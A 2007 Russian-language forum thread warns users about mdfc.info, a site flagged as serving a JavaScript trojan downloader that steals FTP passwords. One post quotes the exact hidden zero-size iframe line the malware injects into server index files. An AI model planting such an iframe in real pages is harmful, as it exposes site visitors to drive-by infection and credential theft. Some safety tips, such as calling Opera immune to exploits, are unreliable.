Pashist Опубликовано 11 мая, 2007 Жалоба Поделиться Опубликовано 11 мая, 2007 недавно по аське ришла ссылка на mdfc.info. захожу, а каспер ругается, что объект заражен вирусом Trojan-Downloader.JS.Agent.dd позже выясняется, что с ася, с uin-а которой пришла ссылка была "угнана" и чувак остался без семизнака... В общем, от греха подальше, не ходите на этот сайт Ссылка на комментарий Поделиться на другие сайты Поделиться
veiK Опубликовано 11 мая, 2007 Жалоба Поделиться Опубликовано 11 мая, 2007 Здорова А мне до лампочки! :) Так как серфить нада ЛИСОЙ! Об этом толдычут многие форумчане! :) Q-Q Инъекция от mdfc.infoЗа последнее время перестали работать множество сайтов старых заказчиков. Симптомы следующие: нет главной страницы или просто главная страницы неправильно отображается. Причина проста и связана с появлением вируса, который прописывает во все индексные файлы на сервере, следующий в код с фреймом: <iframe width="0" height="0" src="http://www.mdfc.info"></iframe> Цепляется вирус через IE, тянет пароли от фтп. Меняет индексные файлы на сервере и распространяется далее. Подробное обсуждение всех проявлений, последствий и способов борьбы с ним подробно обсуждаются здесь. Не пользуйтесь IE, меняйте пароли, обновляйте антивирусы. Ссылка на комментарий Поделиться на другие сайты Поделиться
NickGolovko Опубликовано 12 мая, 2007 Жалоба Поделиться Опубликовано 12 мая, 2007 Лиса тоже не панацея. ;) А вот Лиса с NoScript.. да, пожалуй. :) Ссылка на комментарий Поделиться на другие сайты Поделиться
Pashist Опубликовано 15 мая, 2007 Автор Жалоба Поделиться Опубликовано 15 мая, 2007 мне от этой напасти хватило каспера на работе и McAfee дома Ссылка на комментарий Поделиться на другие сайты Поделиться
Wlad Опубликовано 16 мая, 2007 Жалоба Поделиться Опубликовано 16 мая, 2007 Pashist: Внатуре вирус..... Ссылка на комментарий Поделиться на другие сайты Поделиться
Saladin Опубликовано 16 мая, 2007 Жалоба Поделиться Опубликовано 16 мая, 2007 А я туда вообще попасть не смог. Видимо много народа ломанулось. ;) Ссылка на комментарий Поделиться на другие сайты Поделиться
Post Опубликовано 16 мая, 2007 Жалоба Поделиться Опубликовано 16 мая, 2007 там стоял сплойт - это вредоностный код который прогружаеться на комп и выдёргивает всякую инфу из него понацея есть - браузеры Opera последней версии, сплойты их не берут. P.S. Про сплойты знаю по наслышке, но смысл написаного мною верен точно. :) Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать учетную запись
Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти